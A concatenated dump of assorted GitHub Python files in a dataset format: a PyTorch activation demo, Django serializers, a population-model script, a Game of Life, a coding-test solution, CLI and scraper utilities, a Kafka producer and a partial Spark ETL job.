self.pool2(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n# create class for basic fully-connected deep neural network\nclass Classifier(nn.Module):\n '''\n Basic fully-connected network to test BReLU.\n '''\n def __init__(self):\n super().__init__()\n\n # initialize layers\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 128)\n self.fc3 = nn.Linear(128, 64)\n self.fc4 = nn.Linear(64, 10)\n\n # initialize SReLU\n self.a1 = BReLU.apply\n self.a2 = BReLU.apply\n self.a3 = BReLU.apply\n\n def forward(self, x):\n # make sure the input tensor is flattened\n x = x.view(x.shape[0], -1)\n\n # apply SReLU function\n x = self.a1(self.fc1(x))\n x = self.a2(self.fc2(x))\n x = self.a3(self.fc3(x))\n x = F.log_softmax(self.fc4(x), dim=1)\n\n return x\n\ndef main():\n '''\n Script for BReLU demonstration.\n '''\n # Parse 
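# The scanner above collects unique URL characters in a list, paying O(n) per
# membership test; a set gives the same answer with O(1) lookups. A sketch on
# in-memory lines rather than the log files (the guard uses >= 18 because
# index 17 is accessed; the original's >= 17 can IndexError on exactly 17
# fields):
def unique_chars(lines):
    seen = set()
    for line in lines:
        fields = line.split(" ")
        if len(fields) >= 18 and fields[15] == "GET" and fields[4] != "-":
            seen.update(fields[17])  # add every character of the URL field
    return seen

sample = "a b c d e f g h i j k l m n o GET x http://ex/?q=1"
print(sorted(unique_chars([sample])))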
command line arguments\n parser = argparse.ArgumentParser(description='Argument parser')\n\n # Add argument to choose network architecture\n parser.add_argument('--model', action='store', default = 'FC',\n help='Model architecture: use fully-connected model or CNN.',\n choices = ['FC', 'CNN'])\n\n # Parse command line arguments\n results = parser.parse_args()\n architecture = results.model\n\n # apply BReLU to random tensor\n brelu_activation = BReLU.apply\n t = torch.randn((5,5), dtype=torch.float, requires_grad = True)\n t = brelu_activation(t)\n\n # apply BReLU for simple model (FC or CNN depending on parameter)\n # create a model to classify Fashion MNIST dataset\n # Define a transform\n transform = transforms.Compose([transforms.ToTensor()])\n\n # Download and load the training data for Fashion MNIST\n trainset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)\n\n # Download and load the test data for Fashion MNIST\n testset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=False, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)\n\n print(\"Create model with {activation} function.\\n\".format(activation = 'BReLU'))\n\n # create model\n if (architecture == 'FC'):\n model = Classifier()\n criterion = nn.NLLLoss()\n else:\n model = CNN()\n criterion = nn.CrossEntropyLoss()\n print(model)\n\n # Train the model\n print(\"Training the model on Fashion MNIST dataset with {} activation function.\\n\".format('BReLU'))\n\n optimizer = optim.Adam(model.parameters(), lr=0.003)\n\n epochs = 5\n\n for e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n images = images.view(images.shape[0], -1)\n log_ps = model(images)\n loss = criterion(log_ps, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n print(f\"Training loss: {running_loss}\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"mbijon/Echo","sub_path":"Smoke_tests/torch_brelu_demo.py","file_name":"torch_brelu_demo.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"19008632422","text":"from rest_framework.serializers import ModelSerializer,PrimaryKeyRelatedField\nfrom api.models import Comment,Like,Item\nfrom api.serializers.user import UserSerializer\nfrom api.serializers.item import ItemDetailSerializer\nfrom django.contrib.auth.models import User\n\nclass CommentSerializer(ModelSerializer):\n\n\towner=UserSerializer(many=False,read_only=False)\n\titem=PrimaryKeyRelatedField(queryset=Item.objects.all())\n\tclass Meta:\n\t\tmodel=Comment\n\t\tfields=(\n\t\t\t'id',\n\t\t\t'item',\n\t\t\t'owner',\n\t\t\t'body',\n\t\t\t'created_at',\n\t\t\t'updated_at',\n\t\t\t)\n\t\tread_only_fields=['id']\n\n\nclass LikeSerializer(ModelSerializer):\n\n\towner=UserSerializer(many=False,read_only=False)\n\titem=PrimaryKeyRelatedField(queryset=Item.objects.all())\n\tclass 
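# BReLU above is invoked through torch.autograd.Function (BReLU.apply);
# echoAI's exact forward/backward is not shown in this record, so the sketch
# below uses a clipped-ReLU stand-in purely to illustrate the custom-Function
# pattern itself:
import torch

class ClippedReLU(torch.autograd.Function):
    @staticmethod
    def forward(ctx, x):
        ctx.save_for_backward(x)
        return x.clamp(min=0.0, max=1.0)

    @staticmethod
    def backward(ctx, grad_output):
        (x,) = ctx.saved_tensors
        # gradient flows only where the clamp was inactive
        mask = (x > 0) & (x < 1)
        return grad_output * mask.to(grad_output.dtype)

act = ClippedReLU.apply
y = act(torch.randn(3, requires_grad=True))
y.sum().backward()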
Meta:\n\t\tmodel=Like\n\t\tfields=(\n\t\t\t'id',\n\t\t\t'item',\n\t\t\t'owner',\n\t\t\t'created_at',\n\t\t\t'updated_at',\n\t\t\t)\n\t\tread_only_fields=['id']","repo_name":"Saumitra-Shukla/Groups-App-Balloon","sub_path":"base/api/serializers/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27846568244","text":"import numpy as np\r\nimport time\r\n\r\nstart = time.time()\r\n\r\n\"\"\"\r\nfrom mpi4py import MPI \r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nsize = comm.Get_size() \"\"\"\r\n\r\n# CREATE THE PROJECTION MATRIX\r\nL = np.array([[0, 0.133, 1.082, 1.194, 1.590, 1.590, 1.590, 1.590],\r\n [0.380, 0, 0, 0, 0, 0, 0, 0], \r\n [0, 0.653, 0, 0, 0, 0, 0, 0], \r\n [0, 0, 0.850, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0.400, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0.589, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0.589, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0.589, 0]])\r\n\r\n#AGE DISTRIBUTION AT, t = 0\r\nx_0 = np.array([[20], [10], [9], [9], [3], [3], [2], [2]])\r\n\r\n#FINDING THE STABLE POPULATION DISTRIBUTION\r\nkmax = 1000\r\nk = 1\r\n\r\nwhile k < kmax:\r\n Lk = np.linalg.matrix_power(L, k)\r\n x_t = np.matmul(Lk, x_0)\r\n #computing total population\r\n total_pop = np.sum(x_t)\r\n #initializing convergence condition\r\n if total_pop <= 1:\r\n break\r\n #reassingment\r\n k += 1\r\n\r\n\r\n\r\n\r\n#FINDING PROJECTED POPULATION GROWTH RATE\r\neigen_values, eigen_vectors = np.linalg.eig(L)\r\nlambdah = np.linalg.norm(eigen_values, np.inf)\r\nyearly_decline = (lambdah - 1) * 100\r\n\r\n\r\nsurvival = [0.38, 0.653, 0.85, 0.4, 0.589, 0.589, 0.589]\r\n\r\nparams = [1.05, 1.1, 1.15, 1.2, 0.95, 0.9, 0.85, 0.8]\r\n\r\n\r\nchange_list = []\r\nfor x in survival:\r\n for y in params:\r\n p_new = x*y\r\n change_list.append(p_new)\r\n\r\nchange_arr = np.vstack(change_list)\r\n\r\nchange_arr\r\n\r\nP1_new = change_arr[0: 8]\r\nP2_new = change_arr[8: 16]\r\nP3_new = change_arr[16: 24]\r\nP4_new = change_arr[24: 32]\r\nP5_new = change_arr[32: 40]\r\nP6_new = change_arr[40: 48]\r\nP7_new = change_arr[48: 56]\r\n\r\n\r\n\r\n\r\nrate_1 = []\r\nL1 = np.copy(L)\r\nfor entry in P1_new:\r\n L1[1,0] = entry\r\n eigen_value1, eigen_vector1 = np.linalg.eig(L1)\r\n lambdah1 = np.linalg.norm(eigen_value1, np.inf)\r\n rate_1.append(lambdah1)\r\n\r\nrate_2 = []\r\nL2 = np.copy(L)\r\nfor entry in P2_new:\r\n L2[2,1] = entry\r\n eigen_value2, eigen_vector2 = np.linalg.eig(L2)\r\n lambdah2 = np.linalg.norm(eigen_value2, np.inf)\r\n rate_2.append(lambdah2)\r\n\r\nrate_3 = []\r\nL3 = np.copy(L)\r\nfor entry in P3_new:\r\n L3[3,2] = entry\r\n eigen_value3, eigen_vector3 = np.linalg.eig(L3)\r\n lambdah3 = np.linalg.norm(eigen_value3, np.inf)\r\n rate_3.append(lambdah3)\r\n\r\nrate_4 = []\r\nL4 = np.copy(L)\r\nfor entry in P4_new:\r\n L4[4,3] = entry\r\n eigen_value4, eigen_vector4 = np.linalg.eig(L4)\r\n lambdah4 = np.linalg.norm(eigen_value4, np.inf)\r\n rate_4.append(lambdah4)\r\n\r\nrate_5 = []\r\nL5 = np.copy(L)\r\nfor entry in P5_new:\r\n L5[5,4] = entry\r\n eigen_value5, eigen_vector5 = np.linalg.eig(L5)\r\n lambdah5 = np.linalg.norm(eigen_value5, np.inf)\r\n rate_5.append(lambdah5)\r\n \r\nrate_6 = []\r\nL6 = np.copy(L)\r\nfor entry in P6_new:\r\n L6[6,5] = entry\r\n eigen_value6, eigen_vector6 = np.linalg.eig(L6)\r\n lambdah6 = np.linalg.norm(eigen_value6, np.inf)\r\n rate_6.append(lambdah6)\r\n\r\nrate_7 = []\r\nL7 = np.copy(L)\r\nfor entry in P7_new:\r\n L7[7,6] = entry\r\n eigen_value7, eigen_vector7 = 
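# The extinction loop above recomputes L**k from scratch each year via
# np.linalg.matrix_power; updating the population vector in place is
# equivalent and cheaper (toy 2-stage matrix with assumed values):
import numpy as np

L = np.array([[0.0, 1.5],
              [0.4, 0.0]])      # toy projection matrix
x = np.array([[10.0], [5.0]])   # initial age distribution

years = 0
while x.sum() > 1 and years < 1000:
    x = L @ x                   # one year of projection: x_{t+1} = L x_t
    years += 1

print(years, x.sum())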
np.linalg.eig(L7)\r\n lambdah7 = np.linalg.norm(eigen_value7, np.inf)\r\n rate_7.append(lambdah7)\r\n\r\n\r\n\r\n# change in lambdah\r\nlam1 = np.vstack(rate_1).reshape(-1,1)\r\nd_lam1 = lam1 - lambdah\r\n#change in survivability\r\ndP1 = P1_new - survival[0]\r\n#sensitivity\r\nsense1 = d_lam1/dP1\r\n\r\n\r\n\r\nlam2 = np.vstack(rate_2).reshape(-1, 1)\r\nd_lam2 = lam2 - lambdah\r\n#change in survivability\r\ndP2 = P2_new - survival[1]\r\n#sensitivity\r\nsense2 = d_lam2/dP2\r\n\r\nlam3 = np.asarray(rate_3).reshape(-1, 1)\r\nd_lam3 = lam3 - lambdah\r\n#change in survivability\r\ndP3 = P3_new - survival[2]\r\n#sensitivity\r\nsense3 = d_lam3/dP3\r\n\r\n\r\nlam4 = np.asarray(rate_4).reshape(-1, 1)\r\nd_lam4 = lam4 - lambdah\r\n#change in survivability\r\ndP4 = P4_new - survival[3]\r\n#sensitivity\r\nsense4 = d_lam4/dP4\r\n\r\n\r\nlam5 = np.asarray(rate_5).reshape(-1, 1)\r\nd_lam5 = lam5 - lambdah\r\n#change in survivability\r\ndP5 = P5_new - survival[4]\r\n#sensitivity\r\nsense5 = d_lam5/dP5\r\n\r\n\r\nlam6 = np.asarray(rate_6).reshape(-1, 1)\r\nd_lam6 = lam6 - lambdah\r\n#change in survivability\r\ndP6 = P6_new - survival[5]\r\n#sensitivity\r\nsense6 = d_lam6/dP6\r\n\r\nlam7 = np.asarray(rate_7).reshape(-1, 1)\r\nd_lam7 = lam7 - lambdah\r\n#change in survivability\r\ndP7 = P7_new - survival[6]\r\n#sensitivity\r\nsense7 = d_lam7/dP7\r\n\r\n\r\n\r\n\r\nend = time.time()\r\n\r\nprint(\"Decline rate: \", lambdah)\r\nprint(\"\\nAnnual decline: \", yearly_decline)\r\nprint(\"\\nYears of extinction: \", k)\r\n\r\nprint(\"\\nSensitivity 1: \", sense1.round(4))\r\nprint(\"\\nSensitivity 2: \", sense2.round(4))\r\nprint(\"\\nSensitivity 3: \", sense3.round(4))\r\nprint(\"\\nSensitivity 4: \", sense4.round(4))\r\nprint(\"\\nSensitivity 5: \", sense5.round(4))\r\nprint(\"\\nSensitivity 6: \", sense6.round(4))\r\nprint(\"\\nSensitivity 7: \", sense7.round(4))\r\n\r\nprint (\"\\nExecution time: \", str(end-start))\r\n\r\n","repo_name":"nnamdi095/Age-Structured-Population-Model","sub_path":"age_model_extinction_serial.py","file_name":"age_model_extinction_serial.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43657557196","text":"from django.http.response import Http404\nfrom django.views.generic.base import View, TemplateView\nfrom django_mitid_auth import login_provider_class\nfrom django_mitid_auth.saml.saml2 import Saml2\n\n\nclass MetadataView(View):\n def get(self, request):\n provider = login_provider_class()\n if issubclass(provider, Saml2):\n return provider.metadata(request)\n else:\n raise Http404\n\n\nclass AccessDeniedView(TemplateView):\n status = 403\n\n def render_to_response(self, context, **response_kwargs):\n response_kwargs[\"status\"] = self.status\n return super().render_to_response(context, **response_kwargs)\n","repo_name":"magenta-aps/gl-django-login","sub_path":"src/django_mitid_auth/saml/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35315423257","text":"from multiprocessing import Pool\r\nimport time\r\nimport threading\r\nimport random\r\nimport numpy as np\r\nimport os\r\nimport copy\r\n\r\nclass Board:\r\n def __init__(self, width, height, beVerbose):\r\n self.width = width\r\n self.height = height\r\n self.beVerbose = beVerbose\r\n self.myBoard = np.zeros((width, height), dtype=bool)\r\n\r\n '''\r\n Function to init board\r\n '''\r\n 
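# The growth rate lambda used above is the dominant eigenvalue of the Leslie
# matrix; np.linalg.norm(eigenvalues, np.inf) is just its maximum absolute
# value, equivalent to (same toy matrix as before):
import numpy as np

L = np.array([[0.0, 1.5],
              [0.4, 0.0]])
lam = abs(np.linalg.eigvals(L)).max()  # dominant eigenvalue magnitude
print(lam, (lam - 1) * 100)            # lambda < 1 => negative % = decline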
def initBoard(self):\r\n        for y in range(self.height):\r\n            for x in range(self.width):\r\n                rnd = random.randint(0, 1)\r\n                self.myBoard[x][y] = True if rnd == 1 else False\r\n    \r\n    '''\r\n    Function to update board\r\n    ''' \r\n    def updateBoard(self, tmp):\r\n        tmpBoard = copy.deepcopy(self.myBoard)\r\n        for y in range(self.height):\r\n            for x in range(self.width):\r\n                neighbors = self.countLiveNeighbors(x, y)\r\n                currentCell = self.myBoard[x][y]\r\n\r\n                if ((currentCell == True and (neighbors == 2 or neighbors == 3)) or (currentCell == False and neighbors == 3)):\r\n                    tmpBoard[x][y] = True\r\n                else:\r\n                    tmpBoard[x][y] = False\r\n        \r\n        self.myBoard = copy.deepcopy(tmpBoard)\r\n\r\n        if self.beVerbose:\r\n            self.printBoard()\r\n\r\n    '''\r\n    Function to count live neighbors of cell\r\n    '''\r\n    def countLiveNeighbors(self, x, y):\r\n        val = 0\r\n\r\n        for j in range(-1, 2):\r\n            if (y + j < 0 or y + j >= self.height):\r\n                continue\r\n\r\n            k = (y + j + self.height) % self.height\r\n\r\n            for i in range(-1, 2):\r\n                if (x + i < 0 or x + i >= self.width):\r\n                    continue\r\n\r\n                h = (x + i + self.width) % self.width\r\n                val = val + (1 if self.myBoard[h][k] else 0)\r\n        return val - (1 if self.myBoard[x][y] else 0) \r\n\r\n    '''\r\n    Function to print board\r\n    '''\r\n    def printBoard(self):\r\n        for y in range(self.height):\r\n            strng = \"\"\r\n            for x in range(self.width):\r\n                if self.myBoard[x][y] == False: strng = strng + \" \"\r\n                else: strng = strng + \"X\"\r\n            print(strng)\r\n        print(\"\\n\\n\\n\")\r\n\r\n\r\n### Function to do serial game of life\r\ndef serialGOF(board, numOfGenerations):\r\n    for i in range(numOfGenerations):\r\n        board.updateBoard(numOfGenerations)\r\n    \r\n### Function to do parallel game of life\r\ndef parallelGOF(board, numOfGenerations):\r\n    pool = Pool()\r\n    hm = pool.map(board.updateBoard, range(numOfGenerations))\r\n    pool.close()\r\n    pool.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    # Parameters\r\n    width = 50\r\n    height = 50\r\n    numOfGenerations = 150\r\n    beVerbose = False\r\n\r\n    # Init serial and parallel board\r\n    board = Board(width, height, beVerbose)\r\n    board.initBoard()\r\n    parallelBoard = Board(width, height, beVerbose)\r\n    parallelBoard.myBoard = board.myBoard\r\n\r\n    # Serial Game of Life\r\n    s1 = time.time()\r\n    serialGOF(board, numOfGenerations)\r\n    e1 = time.time()\r\n    print(\"\\nSerial: {:10.5f}\".format(e1 - s1))\r\n\r\n    # Parallel Game of Life\r\n    s2 = time.time()\r\n    parallelGOF(board, numOfGenerations)\r\n    e2 = time.time()\r\n    print(\"\\nParallel: {:10.5f}\".format(e2 - s2))\r\n    print(\"\\n\")\r\n","repo_name":"Pinkieqt/PAI","sub_path":"python/GOF.py","file_name":"GOF.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12554571908","text":"\"\"\"\n    @ 2019 Kakao Developers Winter Internship coding test: Bad Users\n    @ Prob. https://programmers.co.kr/learn/courses/30/lessons/64064\n      Ref. https://regularmember.tistory.com/192\n    @ Algo: implementation (brute force)\n    @ Start day: 20. 04. 22.\n    @ End day: 20. 04. 
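# countLiveNeighbors above skips out-of-range offsets and then also applies a
# modulo wrap (a no-op after the skip, so the board is effectively bounded);
# a purely toroidal count, for contrast, on a 0/1 grid (assumed sketch):
def live_neighbors(board, x, y):
    h, w = len(board), len(board[0])
    total = 0
    for dy in (-1, 0, 1):
        for dx in (-1, 0, 1):
            if dx == 0 and dy == 0:
                continue
            total += board[(y + dy) % h][(x + dx) % w]  # wrap at every edge
    return total

glider = [[0, 1, 0],
          [0, 0, 1],
          [1, 1, 1]]
print(live_neighbors(glider, 1, 1))  # 5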
22.\n\"\"\"\n\nfrom itertools import permutations, combinations\n\n\ndef isMatch(bann, users):\n for i in range(len(bann)):\n if bann[i] == '*': continue\n elif bann[i] != users[i]:\n return False\n return True\n\n# ['fr*d*', 'abc1**'] ('frodo', 'fradi')\ndef check(banned_ids, candidate_users):\n len_ids = len(banned_ids)\n # print(\"------------------------------------\")\n for i in range(len_ids):\n if len(banned_ids[i]) != len(candidate_users[i]):\n return False\n # print(banned_ids[i], candidate_users[i], i)\n if isMatch(banned_ids[i], candidate_users[i]) is False:\n return False\n\n return True\n\nans_set = list()\n\ndef solution(user_ids, banned_ids):\n num_of_banned_user = len(banned_ids)\n ans = 0\n\n for a in permutations(user_ids, num_of_banned_user):\n print(a)\n\n for candidate_users in permutations(user_ids, num_of_banned_user):\n if check(banned_ids, candidate_users) is True:\n # candidate_users = set(candidate_users)\n # print(\"D\", candidate_users)\n ans_set.append(candidate_users)\n ans += 1\n print(\"Ans\", banned_ids, candidate_users)\n\n test = ans_set\n # print(ans_set)\n return ans\n\n\n# user_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\n# banned_id = [\"fr*d*\", \"abc1**\"]\n# print(solution(user_id, banned_id)) # 2\n\nuser_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\nbanned_id = [\"*rodo\", \"*rodo\", \"******\"]\nprint(solution(user_id, banned_id)) # 2\n#\n# user_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\n# banned_id = [\"fr*d*\", \"*rodo\", \"******\", \"******\"] # 2 2 2\n# print(solution(user_id, banned_id)) # 3\n\n","repo_name":"KoEonYack/LevelUp-Algorithm","sub_path":"kakao/19_winter_intern/Q3_2.py","file_name":"Q3_2.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"75030402603","text":"import argparse\r\n\r\n\r\ndef parse_command_line_args():\r\n parser = argparse.ArgumentParser(\r\n prog=\"doxy-helm\",\r\n description=\"Helm Docs Command Line Tool\",\r\n epilog=\"For more information, visit https://github.com/tactful-ai/doxy-helm\",\r\n )\r\n\r\n parser.add_argument(\"-td\", \"--table-depth\", default=1, type=int, help=\"Depth of separate tables to generate\")\r\n parser.add_argument(\"-c\", \"--chart-search-root\", default=\".\", help=\"Directory to search recursively within for charts\")\r\n parser.add_argument(\"-t\", \"--template-file\", default='README.md.gotmpl', help=\"Gotemplate file paths relative to each chart directory from which documentation will be generated\")\r\n parser.add_argument(\"-d\", \"--dry-run\", default=False, action=\"store_true\", help=\"Don't actually render any markdown files, just print to stdout\")\r\n parser.add_argument(\"-o\", \"--output-file\", default=\"README.md\", help=\"Markdown file path relative to each chart directory to which rendered documentation will be written\")\r\n parser.add_argument(\"-i\", \"--ignore-file\", default=\".helmdocsignore\", help=\"The filename to use as an ignore file to exclude chart directories\")\r\n parser.add_argument(\"-f\", \"--values-file\", default=\"values.yaml\", help=\"Path to values file\")\r\n parser.add_argument(\"-s\", \"--sort-values-order\", default=\"File\", choices=[\"AlphaNum\", \"File\"], help=\"Order in which to sort the values table\")\r\n parser.add_argument(\"-n\", \"--ignore-non-descriptions\", default=False, action=\"store_true\", help=\"Ignore values without a comment, these values will not be included 
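# isMatch above treats '*' as a one-character wildcard and check() enforces
# equal lengths; the same predicate as a regex, safe here because user IDs
# are alphanumeric so only '*' needs rewriting:
import re

def is_match(banned, user):
    # '.' matches exactly one character; fullmatch enforces equal length
    return re.fullmatch(banned.replace("*", "."), user) is not None

print(is_match("fr*d*", "frodo"))   # True
print(is_match("fr*d*", "frodoc"))  # False: lengths differ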
in the README\")\r\n\r\n # parser.add_argument(\"-b\", \"--badge-style\", default=\"flat-square\", help=\"Badge style to use for charts\")\r\n # parser.add_argument(\"-u\", \"--document-dependency-values\", action=\"store_true\", help=\"Include dependency values in the chart values documentation\")\r\n # parser.add_argument(\"-g\", \"--chart-to-generate\", nargs=\"+\", default=[], help=\"List of charts that will have documentation generated\")\r\n # parser.add_argument(\"-x\", \"--documentation-strict-mode\", action=\"store_true\", help=\"Fail the generation of docs if there are undocumented values\")\r\n # parser.add_argument(\"-y\", \"--documentation-strict-ignore-absent\", nargs=\"+\", default=[\"service.type\", \"image.repository\", \"image.tag\"], help=\"Values which are allowed not to be documented in strict mode\")\r\n # parser.add_argument(\"-z\", \"--documentation-strict-ignore-absent-regex\", nargs=\"+\", default=[\".*service\\\\.type\", \".*image\\\\.repository\", \".*image\\\\.tag\"], help=\"Regex patterns of values which are allowed not to be documented in strict mode\")\r\n\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n","repo_name":"tactful-ai/doxy-helm","sub_path":"pkg/cmd/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2407230344","text":"'''\nAuthor: whalefall\nDate: 2021-02-20 17:33:34\nLastEditTime: 2021-02-20 18:58:57\nDescription: 简易版的小鸡词典爬虫,可能有限制,供聚合api调用使用\n'''\nimport requests\nimport json\n\nfrom urllib import parse # url编码\n\n\ndef checkWord(word):\n\n headers = {\n 'Host': 'api.jikipedia.com',\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Origin': 'https://jikipedia.com',\n 'XID': 'Sy2mcDa6hc6UH4q5W696OtmrHbmwsh0h2x88BKScmhluiJGIZo1eJLQzZoEpBkBOS1jXDCU4KydLz80Jqpk+EFLqi+w5qWc7f4fIrIoARTA=',\n 'Client-Version': '2.4.1',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Mobile Safari/537.36',\n 'Client': 'web',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json, text/plain, */*',\n 'Sec-Fetch-Dest': 'empty',\n 'Token': '',\n 'Sec-Fetch-Site': 'same-site',\n 'Sec-Fetch-Mode': 'cors',\n # 进行url编码\n 'Referer': 'https://jikipedia.com/searching?phrase={}'.format(parse.quote(word)),\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n }\n\n data = {\"phrase\": \"{}\".format(word), \"page\": 1}\n try:\n response = requests.post(\n 'https://api.jikipedia.com/go/search_definitions', headers=headers, json=data, verify=False).json()\n\n # print(response)\n title = response[\"data\"][0][\"term\"][\"title\"]\n content = response[\"data\"][0][\"content\"].replace(\" \",\"\")\n # print(title, content)\n dict = {\n \"title\": title,\n \"content\": content,\n }\n except Exception as e:\n print(\"[xiaojiDict]查%s出现错误! 
Error info: %s\" % (word, e))\n        dict = {\n            \"title\": \"Error looking up %s!\" % (word),\n            \"content\": \"Error info: %s\" % (e),\n        }\n    return dict\n\n\nif __name__ == \"__main__\":\n\n    checkWord(\"时代峰峻\")\n","repo_name":"WhaleFell/PythonAPI","sub_path":"function/xiaojiDict.py","file_name":"xiaojiDict.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25520154097","text":"import os,datetime\n\nflag = '<DIR>' if os.path.isdir('.') else ' '\n\n\nlist = os.listdir('.')\nfor i in list:\n    fname = i\n    fsize = os.path.getsize(fname)\n    ftime = (datetime.datetime.fromtimestamp(os.path.getmtime(fname))).strftime('%Y/%m/%d %H:%M')\n    flag = '<DIR>' if os.path.isdir(i) else ' '\n    print('%s\\t\\t%s\\t%10d\\t\\t%s' %(ftime,flag,fsize,fname))\n","repo_name":"xuminnju/PycharmProjects","sub_path":"os/homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"106788073","text":"from json import dumps\nfrom kafka.producer import KafkaProducer\nimport os\n\nkafka_broker = os.environ.get(\"KAFKA_BROKER\")\nproducer = None\n\n\ndef set_up_a_producer():\n    try:\n        global producer\n        producer = KafkaProducer(\n            bootstrap_servers=[kafka_broker],\n            value_serializer=lambda x: dumps(x).encode('utf-8')\n        )\n    except Exception as error:\n        print(error)\n        set_up_a_producer()\n    else:\n        print(\"Api has been successfully connected to the broker\")\n\n\nset_up_a_producer()\n","repo_name":"BorissowT/PictureResizeApi","sub_path":"api_container/kafka_client/kafka_producer.py","file_name":"kafka_producer.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37554506717","text":"import configparser\nfrom datetime import datetime\nimport os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import udf, to_timestamp\nfrom pyspark.sql.functions import (year, month, dayofmonth,\n                                   hour, weekofyear, date_format)\n\nfrom pyspark.sql.types import TimestampType\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID'] = config['AWS_ACCESS_KEY_ID']\nos.environ['AWS_SECRET_ACCESS_KEY'] = config['AWS_SECRET_ACCESS_KEY']\n\n\ndef create_spark_session():\n    '''\n    Creates Spark session\n\n    Returns\n    -------\n    SparkSession\n        A SparkSession object\n    '''\n    spark = SparkSession \\\n        .builder \\\n        .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n        .getOrCreate()\n    return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n    '''\n    Processes song data\n\n    Parameters\n    ----------\n    spark : SparkSession object\n        The Spark session to load/save data\n    input_data : str\n        Input file directory\n    output_data : str\n        Output parquet file directory\n    '''\n    # get filepath to song data file\n    song_data = input_data + \"song_data/*/*/*\"\n\n    # read song data file\n    df = spark.read.json(song_data)\n\n    # Creating a temp view to isolate info\n    df.createOrReplaceTempView(\"songs_table_data\")\n\n    # extract columns to create songs table\n    songs_table = spark.sql(\"\"\"\n        SELECT DISTINCT song_id, title, artist_id, year, duration\n        FROM songs_table_data\n    \"\"\")\n\n    # write songs table to parquet files partitioned by year and artist\n    songs_table.write.partitionBy(\"year\", \"artist_id\") \\\n        .parquet(output_data + \"songs_table\")\n\n    # extract columns to create artists table\n    
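# The Kafka producer above only connects; sending a JSON-serialized message
# then looks like this (broker address and topic name are placeholders):
from json import dumps
from kafka import KafkaProducer

producer = KafkaProducer(
    bootstrap_servers=["localhost:9092"],
    value_serializer=lambda x: dumps(x).encode("utf-8"),
)
producer.send("resize-requests", value={"image_id": 42})  # async by default
producer.flush()  # block until the batch is actually delivered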
artists_table = spark.sql(\"\"\"\n        SELECT DISTINCT artist_id, artist_name, artist_location,\n            artist_latitude, artist_longitude\n        FROM songs_table_data\n    \"\"\")\n\n    # write artists table to parquet files\n    artists_table.write.mode('overwrite') \\\n        .parquet(output_data + \"artists_table\")\n\n\ndef process_log_data(spark, input_data, output_data):\n    '''\n    Processes log data\n\n    Parameters\n    ----------\n    spark : SparkSession object\n        The Spark session to load/save data\n    input_data : str\n        Input file directory\n    output_data : str\n        Output parquet file directory\n    '''\n    # get filepath to log data file\n    log_data = input_data + \"log_data/*/*/*\"\n\n    # read log data file\n    df = spark.read.json(log_data)\n\n    # filter by actions for song plays\n    df = df.where(df.page == \"NextSong\")\n\n    # create timestamp column from original timestamp column (ts is in epoch millis)\n    get_timestamp = udf(lambda x: datetime.fromtimestamp(x / 1000),\n                        TimestampType())\n    df = df.withColumn('timestamp', get_timestamp('ts'))\n\n    # create datetime column from original timestamp column\n    get_datetime = udf(lambda x: datetime.fromtimestamp(x/1000),\n                       TimestampType())\n    df = 